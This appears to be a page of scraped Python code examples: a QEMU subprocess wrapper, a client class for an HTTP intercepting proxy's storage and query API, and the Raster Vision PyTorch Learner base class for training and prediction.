        self.outbytes = bytearray()
        self.on_output = []

    @staticmethod
    def get_gdb_port():
        if QEMU._GDBPORT is None:
            p = Popen(["make", "-s", "--no-print-directory", "print-gdbport"],
                      stdout=subprocess.PIPE)
            (out, _) = p.communicate()
            if p.returncode:
                raise RuntimeError(
                    "Failed to get gdbport: make exited with %d" %
                    p.returncode)
            QEMU._GDBPORT = int(out)
        return QEMU._GDBPORT

    def fileno(self):
        if self.proc:
            return self.proc.stdout.fileno()

    def handle_read(self):
        buf = os.read(self.proc.stdout.fileno(), 4096)
        self.outbytes.extend(buf)
        self.output = self.outbytes.decode("utf-8", "replace")
        for callback in self.on_output:
            callback(buf)
        if buf == b"":
            self.wait()
            return

    def wait(self):
        if self.proc:
            self.proc.wait()
            self.proc = None

    def kill(self):
        if self.proc:
            self.proc.terminate()
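
fileno() and handle_read() above are designed to plug into a select() loop.
A sketch of a driver that pumps QEMU's output until the child exits (the
make target is illustrative):

import select

qemu = QEMU('qemu')                  # runs `make -s --no-print-directory qemu`
while qemu.proc is not None:
    ready, _, _ = select.select([qemu], [], [])
    if ready:
        qemu.handle_read()           # appends to qemu.output, reaps on EOF
print(qemu.output)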
Example #47
class ProxyClient:
    def __init__(self, binary=None, debug=False, conn_addr=None):
        self.binloc = binary
        self.proxy_proc = None
        self.ltype = None
        self.laddr = None
        self.debug = debug
        self.conn_addr = conn_addr
        
        self.conns = set()
        self.msg_conn = None # conn for single req/rsp messages
        
        self.context = RequestContext(self)
        
        self.storage_by_id = {}
        self.storage_by_prefix = {}
        self.proxy_storage = None
        self.inmem_storage = None
        
        self.reqrsp_methods = {
            "submit_command",
            #"reqrsp_cmd",
            "ping",
            #"submit",
            #"save_new",
            #"query_storage",
            #"req_by_id",
            "set_scope",
            "get_scope",
            # "add_tag",
            # "remove_tag",
            # "clear_tag",
            "all_saved_queries",
            "save_query",
            "load_query",
            "delete_query",
            "add_listener",
            "remove_listener",
            "get_listeners",
            "load_certificates",
            "set_certificates",
            "clear_certificates",
            "generate_certificates",
            "generate_pem_certificates",
            "validate_query",
            "check_request",
            "list_storage",
            # "add_sqlite_storage",
            # "add_in_memory_storage",
            # "close_storage",
            # "set_proxy_storage",
            "set_proxy"
        }
        
    def __enter__(self):
        if self.conn_addr is not None:
            self.msg_connect(self.conn_addr)
        else:
            self.execute_binary(binary=self.binloc, debug=self.debug)
        return self
    
    def __exit__(self, exc_type, exc_value, traceback):
        self.close()
        
    def __getattr__(self, name):
        if name in self.reqrsp_methods:
            return getattr(self.msg_conn, name)
        raise NotImplementedError(name)

    @property
    def maddr(self):
        if self.ltype is not None:
            return "{}:{}".format(self.ltype, self.laddr)
        else:
            return None
        
    def execute_binary(self, binary=None, debug=False, listen_addr=None):
        self.binloc = binary
        args = [self.binloc]
        if listen_addr is not None:
            args += ["--msglisten", listen_addr]
        else:
            args += ["--msgauto"]

        if debug:
            args += ["--dbg"]
        self.proxy_proc = Popen(args, stdout=PIPE, stderr=PIPE)

        # Wait for it to start and make connection
        listenstr = self.proxy_proc.stdout.readline().rstrip()
        self.msg_connect(listenstr.decode())
        
    def msg_connect(self, addr):
        self.ltype, self.laddr = addr.split(":", 1)
        self.msg_conn = self.new_conn()
        self._get_storage()
        
    def close(self):
        conns = list(self.conns)
        for conn in conns:
            conn.close()
        if self.proxy_proc is not None:
            self.proxy_proc.terminate()

    def new_conn(self):
        conn = ProxyConnection(kind=self.ltype, addr=self.laddr)
        conn.parent_client = self
        conn.debug = self.debug
        self.conns.add(conn)
        return conn
    
    # functions involving storage
    
    def _add_storage(self, storage, prefix):
        self.storage_by_prefix[prefix] = storage
        self.storage_by_id[storage.storage_id] = storage
        
    def _clear_storage(self):
        self.storage_by_prefix = {}
        self.storage_by_id = {}

    def _get_storage(self):
        self._clear_storage()
        storages = self.list_storage()
        for s in storages:
            stype, prefix = s.description.split("|")
            storage = ActiveStorage(stype, s.storage_id, prefix)
            self._add_storage(storage, prefix)
    
    def parse_reqid(self, reqid):
        if reqid[0].isalpha():
            prefix = reqid[0]
            realid = reqid[1:]
        else:
            prefix = ""
            realid = reqid
        # `u`, `s` are special cases for the unmangled version of req and rsp
        if prefix == 'u':
            req = self.req_by_id(realid)
            if req.unmangled is None:
                raise MessageError("request %s was not mangled" % reqid)
            ureq = req.unmangled
            return self.storage_by_id[ureq.storage_id], ureq.db_id
        elif prefix == 's':
            req = self.req_by_id(realid)
            if req.response is None:
                raise MessageError("request %s has no response" % reqid)
            if req.response.unmangled is None:
                raise MessageError("response %s was not mangled" % reqid)
            return self.storage_by_id[req.storage_id], req.db_id
        else:
            storage = self.storage_by_prefix[prefix]
        return storage, realid
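    # A worked illustration of the reqid scheme above (values hypothetical):
    # with a storage registered under prefix 'a', "a12" resolves to
    # (storage_by_prefix['a'], "12"); "u12" resolves to the storage and db_id
    # of request 12's unmangled version; "s12" resolves to request 12 after
    # checking that its response has an unmangled version; a bare "12" falls
    # through to the storage registered under the empty prefix "".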

    def storage_iter(self):
        for _, s in self.storage_by_id.items():
            yield s
            
    def _stg_or_def(self, storage):
        if storage is None:
            return self.proxy_storage
        return storage

    def is_in_context(self, req):
        return self.check_request(self.context.query, req)
    
    def in_context_requests(self, headers_only=False, max_results=0):
        results = self.query_storage(self.context.query,
                                     headers_only=headers_only,
                                     max_results=max_results)
        ret = results
        if max_results > 0 and len(results) > max_results:
            ret = results[:max_results]
        return ret

    def in_context_requests_iter(self, headers_only=False, max_results=0):
        results = self.query_storage(self.context.query,
                                     headers_only=headers_only,
                                     max_results=max_results)
        ret = results
        if max_results > 0 and len(results) > max_results:
            ret = results[:max_results]
        for reqh in ret:
            req = self.req_by_id(reqh.db_id, storage_id=reqh.storage_id)
            yield req
    
    def get_reqid(self, req):
        prefix = ""
        if req.storage_id in self.storage_by_id:
            s = self.storage_by_id[req.storage_id]
            prefix = s.prefix
        return "{}{}".format(prefix, req.db_id)
    
    # functions that don't just pass through to underlying conn
    
    def add_sqlite_storage(self, path, prefix):
        desc = _serialize_storage("sqlite", prefix)
        sid = self.msg_conn.add_sqlite_storage(path, desc)
        s = ActiveStorage(type="sqlite", storage_id=sid, prefix=prefix)
        self._add_storage(s, prefix)
        return s

    def add_in_memory_storage(self, prefix):
        desc = _serialize_storage("inmem", prefix)
        sid = self.msg_conn.add_in_memory_storage(desc)
        s = ActiveStorage(type="inmem", storage_id=sid, prefix=prefix)
        self._add_storage(s, prefix)
        return s
    
    def close_storage(self, storage_id):
        s = self.storage_by_id[storage_id]
        self.msg_conn.close_storage(s.storage_id)
        del self.storage_by_id[s.storage_id]
        del self.storage_by_prefix[s.prefix]
        
    def set_proxy_storage(self, storage_id):
        s = self.storage_by_id[storage_id]
        self.msg_conn.set_proxy_storage(s.storage_id)
        self.proxy_storage = storage_id
        
    def save_new(self, req, inmem=False, storage=None):
        if inmem:
            storage = self.inmem_storage
        else:
            storage = self._stg_or_def(storage)
        self.msg_conn.save_new(req, storage=storage)
        
    def submit(self, req, save=False, inmem=False, storage=None):
        if save:
            storage = self._stg_or_def(storage)
        if inmem:
            storage = self.inmem_storage
        self.msg_conn.submit(req, storage=storage)

    def query_storage(self, q, max_results=0, headers_only=False, storage=None):
        results = []
        if storage is None:
            for s in self.storage_iter():
                results += self.msg_conn.query_storage(q, max_results=max_results,
                                                       headers_only=headers_only,
                                                       storage=s.storage_id)
        else:
            results += self.msg_conn.query_storage(q, max_results=max_results,
                                                   headers_only=headers_only,
                                                   storage=storage)
        def kfunc(req):
            # Requests with no start time sort as oldest
            if req.time_start is None:
                return datetime.datetime.utcfromtimestamp(0)
            return req.time_start
        # Newest requests first
        results.sort(key=kfunc, reverse=True)
        return results
            
    def req_by_id(self, reqid, storage_id=None, headers_only=False):
        if storage_id is None:
            storage, db_id = self.parse_reqid(reqid)
            storage_id = storage.storage_id
        else:
            db_id = reqid
        retreq = self.msg_conn.req_by_id(db_id, headers_only=headers_only,
                                         storage=storage_id)

        if reqid[0] == 's': # `u` is handled by parse_reqid
            retreq.response = retreq.response.unmangled

        return retreq

    # for these and submit, might need storage stored on the request itself
    def add_tag(self, reqid, tag, storage=None):
        self.msg_conn.add_tag(reqid, tag, storage=self._stg_or_def(storage))

    def remove_tag(self, reqid, tag, storage=None):
        self.msg_conn.remove_tag(reqid, tag, storage=self._stg_or_def(storage))

    def clear_tag(self, reqid, storage=None):
        self.msg_conn.clear_tag(reqid, storage=self._stg_or_def(storage))

    def all_saved_queries(self, storage=None):
        return self.msg_conn.all_saved_queries(storage=self._stg_or_def(storage))

    def save_query(self, name, filt, storage=None):
        self.msg_conn.save_query(name, filt, storage=self._stg_or_def(storage))

    def load_query(self, name, storage=None):
        self.msg_conn.load_query(name, storage=self._stg_or_def(storage))

    def delete_query(self, name, storage=None):
        self.msg_conn.delete_query(name, storage=self._stg_or_def(storage))
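
A minimal usage sketch for the class above (the binary path is hypothetical; the methods are ProxyClient's own API):

with ProxyClient(binary="./proxy-binary") as client:
    client.ping()
    s = client.add_in_memory_storage("m")
    client.set_proxy_storage(s.storage_id)
    for req in client.in_context_requests(headers_only=True):
        print(client.get_reqid(req))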
Example #48
0
class Learner(ABC):
    """Abstract training and prediction routines for a model.

    This can be subclassed to handle different computer vision tasks. If a model_path
    is passed to the constructor, the Learner can only be used for prediction (ie. only
    predict and numpy_predict should be called). Otherwise, the Learner can be used for
    training using the main() method.

    Note that the validation set is used to validate at the end of each epoch, and the
    test set is only used at the end of training. It's possible to set these to the same
    dataset if desired.
    """
    def __init__(self,
                 cfg: LearnerConfig,
                 tmp_dir: str,
                 model_path: Optional[str] = None):
        """Constructor.

        Args:
            cfg: configuration
            tmp_dir: root of temp dirs
            model_path: a local path to model weights. If provided, the model is loaded
                and it is assumed that this Learner will be used for prediction only.
        """
        self.cfg = cfg
        self.tmp_dir = tmp_dir

        # TODO make cache dirs configurable
        torch_cache_dir = '/opt/data/torch-cache'
        os.environ['TORCH_HOME'] = torch_cache_dir
        self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
        self.data_cache_dir = '/opt/data/data-cache'
        make_dir(self.data_cache_dir)

        self.model = self.build_model()
        self.model.to(self.device)

        if model_path is not None:
            if isfile(model_path):
                self.model.load_state_dict(
                    torch.load(model_path, map_location=self.device))
            else:
                raise Exception(
                    'Model could not be found at {}'.format(model_path))
            self.model.eval()
        else:
            log.info(self.cfg)

            # ds = dataset, dl = dataloader
            self.train_ds = None
            self.train_dl = None
            self.valid_ds = None
            self.valid_dl = None
            self.test_ds = None
            self.test_dl = None

            if FileSystem.get_file_system(cfg.output_uri) == LocalFileSystem:
                self.output_dir = cfg.output_uri
                make_dir(self.output_dir)
            else:
                self.output_dir = get_local_path(cfg.output_uri, tmp_dir)
                make_dir(self.output_dir, force_empty=True)
                if not cfg.overfit_mode:
                    self.sync_from_cloud()

            self.last_model_path = join(self.output_dir, 'last-model.pth')
            self.config_path = join(self.output_dir, 'learner-config.json')
            self.train_state_path = join(self.output_dir, 'train-state.json')
            self.log_path = join(self.output_dir, 'log.csv')
            model_bundle_fn = basename(cfg.get_model_bundle_uri())
            self.model_bundle_path = join(self.output_dir, model_bundle_fn)
            self.metric_names = self.build_metric_names()

            str_to_file(self.cfg.json(), self.config_path)
            self.load_init_weights()
            self.load_checkpoint()
            self.opt = self.build_optimizer()
            self.setup_data()
            self.start_epoch = self.get_start_epoch()
            self.steps_per_epoch = len(
                self.train_ds) // self.cfg.solver.batch_sz
            self.step_scheduler = self.build_step_scheduler()
            self.epoch_scheduler = self.build_epoch_scheduler()
            self.setup_tensorboard()

    def main(self):
        """Main training sequence.

        This plots the dataset, runs a training and validation loop (which will resume if
        interrupted), logs stats, plots predictions, and syncs results to the cloud.
        """
        self.run_tensorboard()
        cfg = self.cfg
        self.log_data_stats()
        if not cfg.predict_mode:
            self.plot_dataloaders()
            if cfg.overfit_mode:
                self.overfit()
            else:
                self.train()
                if cfg.save_model_bundle:
                    self.save_model_bundle()

        self.load_checkpoint()
        if cfg.eval_train:
            self.eval_model('train')
        self.eval_model('test')
        self.sync_to_cloud()
        self.stop_tensorboard()

    def sync_to_cloud(self):
        """Sync any output to the cloud at output_uri."""
        sync_to_dir(self.output_dir, self.cfg.output_uri)

    def sync_from_cloud(self):
        """Sync any previous output in the cloud to output_dir."""
        sync_from_dir(self.cfg.output_uri, self.output_dir)

    def setup_tensorboard(self):
        """Setup for logging stats to TB."""
        self.tb_writer = None
        if self.cfg.log_tensorboard:
            self.tb_log_dir = join(self.output_dir, 'tb-logs')
            make_dir(self.tb_log_dir)
            self.tb_writer = SummaryWriter(log_dir=self.tb_log_dir)

    def run_tensorboard(self):
        """Run TB server serving logged stats."""
        if self.cfg.run_tensorboard:
            log.info('Starting tensorboard process')
            self.tb_process = Popen(
                ['tensorboard', '--logdir={}'.format(self.tb_log_dir)])
            terminate_at_exit(self.tb_process)

    def stop_tensorboard(self):
        """Stop TB logging and server if it's running."""
        if self.cfg.log_tensorboard:
            self.tb_writer.close()
            if self.cfg.run_tensorboard:
                self.tb_process.terminate()

    @abstractmethod
    def build_model(self) -> nn.Module:
        """Build a PyTorch model."""
        pass

    def unzip_data(self, uri: Union[str, List[str]]) -> List[str]:
        """Unzip dataset zip files.

        Args:
            uri: a list of URIs of zip files or the URI of a directory containing
                zip files

        Returns:
            paths to directories that each contain contents of one zip file
        """
        data_dirs = []

        if isinstance(uri, list):
            zip_uris = uri
        else:
            zip_uris = ([uri] if uri.endswith('.zip') else list_paths(
                uri, 'zip'))

        for zip_ind, zip_uri in enumerate(zip_uris):
            zip_path = get_local_path(zip_uri, self.data_cache_dir)
            if not isfile(zip_path):
                zip_path = download_if_needed(zip_uri, self.data_cache_dir)
            with zipfile.ZipFile(zip_path, 'r') as zipf:
                data_dir = join(self.tmp_dir, 'data', str(uuid.uuid4()),
                                str(zip_ind))
                data_dirs.append(data_dir)
                zipf.extractall(data_dir)

        return data_dirs

    def get_bbox_params(self) -> Optional[BboxParams]:
        """Returns BboxParams used by albumentations for data augmentation."""
        return None

    def get_data_transforms(self) -> Tuple[BasicTransform, BasicTransform]:
        """Get albumentations transform objects for data augmentation.

        Returns:
           1st tuple arg: a transform that doesn't do any data augmentation
           2nd tuple arg: a transform with data augmentation
        """
        cfg = self.cfg
        bbox_params = self.get_bbox_params()
        transform = Compose([Resize(cfg.data.img_sz, cfg.data.img_sz)],
                            bbox_params=bbox_params)

        augmentors_dict = {
            'Blur': Blur(),
            'RandomRotate90': RandomRotate90(),
            'HorizontalFlip': HorizontalFlip(),
            'VerticalFlip': VerticalFlip(),
            'GaussianBlur': GaussianBlur(),
            'GaussNoise': GaussNoise(),
            'RGBShift': RGBShift(),
            'ToGray': ToGray()
        }
        aug_transforms = []
        for augmentor in cfg.data.augmentors:
            try:
                aug_transforms.append(augmentors_dict[augmentor])
            except KeyError as e:
                log.warning(
                    '{0} is an unknown augmentor. Continuing without {0}. '
                    'Known augmentors are: {1}'.format(
                        e, list(augmentors_dict.keys())))
        aug_transforms.append(Resize(cfg.data.img_sz, cfg.data.img_sz))
        aug_transform = Compose(aug_transforms, bbox_params=bbox_params)

        return transform, aug_transform

    def get_collate_fn(self) -> Optional[callable]:
        """Returns a custom collate_fn to use in DataLoader.

        None is returned if default collate_fn should be used.

        See https://pytorch.org/docs/stable/data.html#working-with-collate-fn
        """
        return None

    def _get_datasets(
        self,
        uri: Union[str,
                   List[str]]) -> Tuple[Dataset, Dataset, Dataset]:  # noqa
        """Gets Datasets for a single group of chips.

        This should be overridden for each Learner subclass.

        Args:
            uri: a list of URIs of zip files or the URI of a directory containing
                zip files

        Returns:
            train, validation, and test DataSets."""
        raise NotImplementedError()

    def get_datasets(self) -> Tuple[Dataset, Dataset, Dataset]:
        """Returns train, validation, and test DataSets."""
        if self.cfg.data.group_uris:
            train_ds_lst, valid_ds_lst, test_ds_lst = [], [], []
            for group_uri in self.cfg.data.group_uris:
                train_ds, valid_ds, test_ds = self._get_datasets(group_uri)
                group_train_sz = self.cfg.data.group_train_sz
                if group_train_sz is not None:
                    train_inds = list(range(len(train_ds)))
                    random.seed(1234)
                    random.shuffle(train_inds)
                    train_inds = train_inds[0:group_train_sz]
                    train_ds = Subset(train_ds, train_inds)
                train_ds_lst.append(train_ds)
                valid_ds_lst.append(valid_ds)
                test_ds_lst.append(test_ds)

            train_ds, valid_ds, test_ds = (ConcatDataset(train_ds_lst),
                                           ConcatDataset(valid_ds_lst),
                                           ConcatDataset(test_ds_lst))
            return train_ds, valid_ds, test_ds
        else:
            return self._get_datasets(self.cfg.data.uri)

    def setup_data(self):
        """Set the the DataSet and DataLoaders for train, validation, and test sets."""
        cfg = self.cfg
        batch_sz = self.cfg.solver.batch_sz
        num_workers = self.cfg.data.num_workers

        train_ds, valid_ds, test_ds = self.get_datasets()
        if len(train_ds) < batch_sz:
            raise ConfigError(
                'Training dataset has fewer elements than batch size.')
        if len(valid_ds) < batch_sz:
            raise ConfigError(
                'Validation dataset has fewer elements than batch size.')
        if len(test_ds) < batch_sz:
            raise ConfigError(
                'Test dataset has fewer elements than batch size.')

        if cfg.overfit_mode:
            train_ds = Subset(train_ds, range(batch_sz))
            valid_ds = train_ds
            test_ds = train_ds
        elif cfg.test_mode:
            train_ds = Subset(train_ds, range(batch_sz))
            valid_ds = Subset(valid_ds, range(batch_sz))
            test_ds = Subset(test_ds, range(batch_sz))

        if cfg.data.train_sz is not None:
            train_inds = list(range(len(train_ds)))
            random.seed(1234)
            random.shuffle(train_inds)
            train_inds = train_inds[0:cfg.data.train_sz]
            train_ds = Subset(train_ds, train_inds)

        collate_fn = self.get_collate_fn()
        train_dl = DataLoader(train_ds,
                              shuffle=True,
                              batch_size=batch_sz,
                              num_workers=num_workers,
                              pin_memory=True,
                              collate_fn=collate_fn)
        valid_dl = DataLoader(valid_ds,
                              shuffle=True,
                              batch_size=batch_sz,
                              num_workers=num_workers,
                              pin_memory=True,
                              collate_fn=collate_fn)
        test_dl = DataLoader(test_ds,
                             shuffle=True,
                             batch_size=batch_sz,
                             num_workers=num_workers,
                             pin_memory=True,
                             collate_fn=collate_fn)

        self.train_ds, self.valid_ds, self.test_ds = (train_ds, valid_ds,
                                                      test_ds)
        self.train_dl, self.valid_dl, self.test_dl = (train_dl, valid_dl,
                                                      test_dl)

    def log_data_stats(self):
        """Log stats about each DataSet."""
        if self.train_ds:
            log.info('train_ds: {} items'.format(len(self.train_ds)))
        if self.valid_ds:
            log.info('valid_ds: {} items'.format(len(self.valid_ds)))
        if self.test_ds:
            log.info('test_ds: {} items'.format(len(self.test_ds)))

    def build_optimizer(self) -> optim.Optimizer:
        """Returns optimizer."""
        return optim.Adam(self.model.parameters(), lr=self.cfg.solver.lr)

    def build_step_scheduler(self) -> _LRScheduler:
        """Returns an LR scheduler that changes the LR each step.

        This is used to implement the "one cycle" schedule popularized by
        fastai.
        """
        scheduler = None
        cfg = self.cfg
        if cfg.solver.one_cycle and cfg.solver.num_epochs > 1:
            total_steps = cfg.solver.num_epochs * self.steps_per_epoch
            step_size_up = (cfg.solver.num_epochs // 2) * self.steps_per_epoch
            step_size_down = total_steps - step_size_up
            scheduler = CyclicLR(self.opt,
                                 base_lr=cfg.solver.lr / 10,
                                 max_lr=cfg.solver.lr,
                                 step_size_up=step_size_up,
                                 step_size_down=step_size_down,
                                 cycle_momentum=False)
            for _ in range(self.start_epoch * self.steps_per_epoch):
                scheduler.step()
        return scheduler
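    # Worked example of the one-cycle arithmetic above (numbers hypothetical):
    # with num_epochs=10 and steps_per_epoch=100, total_steps=1000 and
    # step_size_up=500, so the LR climbs from lr/10 to lr over the first 500
    # steps and decays back over the remaining 500. The trailing loop
    # fast-forwards the scheduler so a resumed run continues mid-cycle.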

    def build_epoch_scheduler(self) -> _LRScheduler:
        """Returns an LR scheduler tha changes the LR each epoch.

        This is used to divide the LR by 10 at certain epochs.
        """
        scheduler = None
        if self.cfg.solver.multi_stage:
            scheduler = MultiStepLR(self.opt,
                                    milestones=self.cfg.solver.multi_stage,
                                    gamma=0.1)
            for _ in range(self.start_epoch):
                scheduler.step()
        return scheduler

    def build_metric_names(self) -> List[str]:
        """Returns names of metrics used to validate model at each epoch."""
        metric_names = [
            'epoch', 'train_time', 'valid_time', 'train_loss', 'val_loss',
            'avg_f1', 'avg_precision', 'avg_recall'
        ]

        for label in self.cfg.data.class_names:
            metric_names.extend([
                '{}_f1'.format(label), '{}_precision'.format(label),
                '{}_recall'.format(label)
            ])
        return metric_names

    @abstractmethod
    def train_step(self, batch: any, batch_ind: int) -> MetricDict:
        """Compute loss for a single training batch.

        Args:
            batch: batch data needed to compute loss
            batch_ind: index of batch within epoch

        Returns:
            dict with 'train_loss' as key and possibly other losses
        """
        pass

    @abstractmethod
    def validate_step(self, batch: any, batch_ind: int) -> MetricDict:
        """Compute metrics on validation batch.

        Args:
            batch: batch data needed to compute validation metrics
            batch_ind: index of batch within epoch

        Returns:
            dict with metric names mapped to metric values
        """
        pass

    def train_end(self, outputs: List[MetricDict],
                  num_samples: int) -> MetricDict:
        """Aggregate the ouput of train_step at the end of the epoch.

        Args:
            outputs: a list of outputs of train_step
            num_samples: total number of training samples processed in epoch
        """
        metrics = {}
        for k in outputs[0].keys():
            metrics[k] = torch.stack([o[k] for o in outputs
                                      ]).sum().item() / num_samples
        return metrics

    def validate_end(self, outputs: List[MetricDict],
                     num_samples: int) -> MetricDict:
        """Aggregate the ouput of validate_step at the end of the epoch.

        Args:
            outputs: a list of outputs of validate_step
            num_samples: total number of validation samples processed in epoch
        """
        metrics = {}
        for k in outputs[0].keys():
            metrics[k] = torch.stack([o[k] for o in outputs
                                      ]).sum().item() / num_samples
        return metrics

    def post_forward(self, x: any) -> any:
        """Post process output of call to model().

        Useful for when predictions are inside a structure returned by model().
        """
        return x

    def prob_to_pred(self, x: Tensor) -> Tensor:
        """Convert a Tensor with prediction probabilities to class ids.

        The class ids should be the classes with the maximum probability.
        """
        raise NotImplementedError()

    def to_batch(self, x: Tensor) -> Tensor:
        """Ensure that image array has batch dimension.

        Args:
            x: assumed to be either image or batch of images

        Returns:
            x with extra batch dimension of length 1 if needed
        """
        if x.ndim == 3:
            x = x.unsqueeze(0)
        return x

    def normalize_input(self, x: Tensor) -> Tensor:
        """Normalize an input image to have values between 0 and 1.

        Args:
            x: an image or batch of images assumed to be in uint8 format

        Returns:
            the same tensor that has been scaled to [0-1].

        """
        return x.float() / 255.0

    def predict(self,
                x: Tensor,
                normalize: bool = False,
                raw_out: bool = False) -> any:
        """Make prediction for an image or batch of images.

        Args:
            x: image or batch of images
            normalize: if True, call normalize_input() on x before passing into model
            raw_out: if True, return prediction probabilities

        Returns:
            the predictions, in probability form if raw_out is True, in class_id form
                otherwise
        """
        x = self.to_batch(x)
        if normalize:
            x = self.normalize_input(x)
        x = self.to_device(x, self.device)
        with torch.no_grad():
            out = self.model(x)
            if not raw_out:
                out = self.prob_to_pred(self.post_forward(out))
        out = self.to_device(out, 'cpu')
        return out

    def output_to_numpy(self, out: any) -> any:
        """Convert output of model to numpy format.

        Args:
            out: the output of the model in PyTorch format

        Returns: the output of the model in numpy format
        """
        return out.numpy()

    def numpy_predict(self, x: np.ndarray, raw_out: bool = False) -> any:
        """Make a prediction using an image or batch of images in numpy format.

        Args:
            x: (ndarray) of shape [height, width, channels] or
                [batch_sz, height, width, channels] in uint8 format
            raw_out: if True, return prediction probabilities

        Returns:
            predictions using numpy arrays
        """
        x = torch.tensor(x)
        x = self.to_batch(x)
        x = x.permute((0, 3, 1, 2))
        out = self.predict(x, normalize=True, raw_out=raw_out)
        return self.output_to_numpy(out)
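    # Usage sketch (array values hypothetical): for a uint8 HWC image,
    #   img = np.zeros((256, 256, 3), dtype=np.uint8)
    #   probs = learner.numpy_predict(img, raw_out=True)
    # numpy_predict adds the batch dimension, permutes HWC -> CHW, and
    # normalizes to [0, 1] before calling the model.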

    def predict_dataloader(self,
                           dl: DataLoader,
                           one_batch: bool = False,
                           return_x: bool = True):
        """Make predictions over all batches in a DataLoader.

        Args:
            dl: the DataLoader
            one_batch: if True, just makes predictions over the first batch
            return_x: if True, returns all the inputs in addition to the predictions and
                targets

        Returns:
            if return_x: (x, y, z) i.e. all images, labels, predictions for dl
            else: (y, z) i.e. all labels, predictions for dl
        """
        self.model.eval()

        xs, ys, zs = [], [], []
        with torch.no_grad():
            for x, y in dl:
                x = self.to_device(x, self.device)
                z = self.prob_to_pred(self.post_forward(self.model(x)))
                x = self.to_device(x, 'cpu')
                z = self.to_device(z, 'cpu')
                if one_batch:
                    return x, y, z
                if return_x:
                    xs.append(x)
                ys.append(y)
                zs.append(z)

        if return_x:
            return torch.cat(xs), torch.cat(ys), torch.cat(zs)
        return torch.cat(ys), torch.cat(zs)

    def get_dataloader(self, split: str) -> DataLoader:
        """Get the DataLoader for a split.

        Args:
            split: a split name which can be train, valid, or test
        """
        if split == 'train':
            return self.train_dl
        elif split == 'valid':
            return self.valid_dl
        elif split == 'test':
            return self.test_dl
        else:
            raise ValueError('{} is not a valid split'.format(split))

    @abstractmethod
    def plot_xyz(self, ax, x: Tensor, y, z=None):
        """Plot image, ground truth labels, and predicted labels.

        Args:
            ax: matplotlib axis on which to plot
            x: image
            y: ground truth labels
            z: optional predicted labels
        """
        pass

    def plot_batch(self, x: Tensor, y, output_path: str, z=None):
        """Plot a whole batch in a grid using plot_xyz.

        Args:
            x: batch of images
            y: ground truth labels
            output_path: local path where to save plot image
            z: optional predicted labels
        """
        batch_sz = x.shape[0]
        ncols = nrows = math.ceil(math.sqrt(batch_sz))
        fig = plt.figure(constrained_layout=True,
                         figsize=(3 * ncols, 3 * nrows))
        grid = gridspec.GridSpec(ncols=ncols, nrows=nrows, figure=fig)

        for i in range(batch_sz):
            ax = fig.add_subplot(grid[i])
            if z is None:
                self.plot_xyz(ax, x[i], y[i])
            else:
                self.plot_xyz(ax, x[i], y[i], z=z[i])

        make_dir(output_path, use_dirname=True)
        plt.savefig(output_path)
        plt.close()

    def plot_predictions(self, split: str):
        """Plot predictions for a split.

        Uses the first batch for the corresponding DataLoader.

        Args:
            split: dataset split. Can be train, valid, or test.
        """
        log.info('Plotting predictions...')
        dl = self.get_dataloader(split)
        output_path = join(self.output_dir, '{}_preds.png'.format(split))
        x, y, z = self.predict_dataloader(dl, one_batch=True)
        self.plot_batch(x, y, output_path, z=z)

    def plot_dataloader(self, dl: DataLoader, output_path: str):
        """Plot images and ground truth labels for a DataLoader."""
        x, y = next(iter(dl))
        self.plot_batch(x, y, output_path)

    def plot_dataloaders(self):
        """Plot images and ground truth labels for all DataLoaders."""
        if self.train_dl:
            self.plot_dataloader(
                self.train_dl, join(self.output_dir, 'dataloaders/train.png'))
        if self.valid_dl:
            self.plot_dataloader(
                self.valid_dl, join(self.output_dir, 'dataloaders/valid.png'))
        if self.test_dl:
            self.plot_dataloader(self.test_dl,
                                 join(self.output_dir, 'dataloaders/test.png'))

    @staticmethod
    def from_model_bundle(model_bundle_uri: str, tmp_dir: str):
        """Create a Learner from a model bundle."""
        model_bundle_path = download_if_needed(model_bundle_uri, tmp_dir)
        model_bundle_dir = join(tmp_dir, 'model-bundle')
        unzip(model_bundle_path, model_bundle_dir)

        config_path = join(model_bundle_dir, 'pipeline-config.json')
        model_path = join(model_bundle_dir, 'model.pth')

        config_dict = file_to_json(config_path)
        config_dict = upgrade_config(config_dict)

        cfg = build_config(config_dict)
        return cfg.learner.build(tmp_dir, model_path=model_path)

    def save_model_bundle(self):
        """Save a model bundle.

        This is a zip file with the model weights in .pth format and a serialized
        copy of the LearningConfig, which allows for making predictions in the future.
        """
        from rastervision.pytorch_learner.learner_pipeline_config import (
            LearnerPipelineConfig)
        model_bundle_dir = join(self.tmp_dir, 'model-bundle')
        make_dir(model_bundle_dir)
        shutil.copyfile(self.last_model_path,
                        join(model_bundle_dir, 'model.pth'))
        pipeline_cfg = LearnerPipelineConfig(learner=self.cfg)
        save_pipeline_config(pipeline_cfg,
                             join(model_bundle_dir, 'pipeline-config.json'))
        zipdir(model_bundle_dir, self.model_bundle_path)

    def get_start_epoch(self) -> int:
        """Get start epoch.

        If training was interrupted, this returns the last complete epoch + 1.
        """
        start_epoch = 0
        if isfile(self.log_path):
            with open(self.log_path) as log_file:
                lines = log_file.readlines()
            # The first line is the CSV header, so only resume if at least
            # one epoch row has been written.
            if len(lines) > 1:
                last_epoch = int(lines[-1].split(',')[0].strip())
                start_epoch = last_epoch + 1
        return start_epoch

    def load_init_weights(self):
        """Load the weights to initialize model."""
        if self.cfg.model.init_weights:
            weights_path = download_if_needed(self.cfg.model.init_weights,
                                              self.tmp_dir)
            self.model.load_state_dict(
                torch.load(weights_path, map_location=self.device))

    def load_checkpoint(self):
        """Load last weights from previous run if available."""
        if isfile(self.last_model_path):
            log.info('Loading checkpoint from {}'.format(self.last_model_path))
            self.model.load_state_dict(
                torch.load(self.last_model_path, map_location=self.device))

    def to_device(self, x: any, device: str) -> any:
        """Load Tensors onto a device.

        Args:
            x: some object with Tensors in it
            device: 'cpu' or 'cuda'

        Returns:
            x but with any Tensors in it on the device
        """
        if isinstance(x, list):
            return [_x.to(device) for _x in x]
        else:
            return x.to(device)

    def train_epoch(self) -> MetricDict:
        """Train for a single epoch."""
        start = time.time()
        self.model.train()
        num_samples = 0
        outputs = []
        with click.progressbar(self.train_dl, label='Training') as bar:
            for batch_ind, (x, y) in enumerate(bar):
                x = self.to_device(x, self.device)
                y = self.to_device(y, self.device)
                batch = (x, y)
                self.opt.zero_grad()
                output = self.train_step(batch, batch_ind)
                outputs.append(output)
                loss = output['train_loss']
                loss.backward()
                self.opt.step()
                if self.step_scheduler:
                    self.step_scheduler.step()
                num_samples += x.shape[0]
        metrics = self.train_end(outputs, num_samples)
        end = time.time()
